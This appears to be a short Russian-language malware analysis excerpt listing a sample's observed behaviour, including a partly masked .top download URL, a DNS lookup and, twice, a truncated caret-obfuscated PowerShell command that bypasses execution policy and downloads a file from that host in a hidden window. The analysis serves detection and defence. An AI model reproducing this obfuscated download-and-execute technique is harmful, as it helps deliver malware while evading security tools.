Техническая информация
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^E^rShe^L^l.^EX^E ^-ExeCutioNpO^L^i^CY^ ^B^yp^a^s^s ^-nOPrO^Fi^le -w^IN^Do^WsT^YL^e H^iD^De^N (NE^W-OBJ^E^Ct^ sySt^eM^.n^e^T.W^E^BC^LIe^Nt).dow^nlo^ADfI^l^E('http://fo###rep...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "pOw^E^rShe^L^l.^EX^E ^-ExeCutioNpO^L^i^CY^ ^B^yp^a^s^s ^-nOPrO^Fi^le -w^IN^Do^WsT^YL^e H^iD^De^N (NE^W-OBJ^E^Ct^ sySt^eM^.n^e^T.W^E^BC^LIe^Nt).dow^nlo^ADfI^l^E('http://fo###rep...' (со скрытым окном)